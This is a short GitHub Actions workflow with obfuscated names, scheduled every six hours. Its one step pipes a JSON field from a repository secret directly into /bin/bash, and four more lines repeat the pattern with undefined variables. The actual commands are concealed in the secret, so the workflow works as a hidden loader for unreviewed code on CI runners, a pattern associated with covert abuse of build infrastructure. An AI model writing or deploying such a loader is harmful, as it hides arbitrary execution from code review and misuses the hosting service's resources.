name: wellgaff
on:
  workflow_dispatch:
  schedule:
    - cron: '3 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wellgaff
        env:
          qemu796: ${{ secrets.qemu796 }}
        run: |
          echo $qemu796 | jq -r .zmvu0 | /bin/bash
          echo $fsrui0787 | jq -r .o2 | /bin/bash
          echo $akdpg135 | jq -r .ermms6 | /bin/bash
          echo $dc7 | jq -r .gdkl98075 | /bin/bash
          echo $vz04 | jq -r .tap0539 | /bin/bash

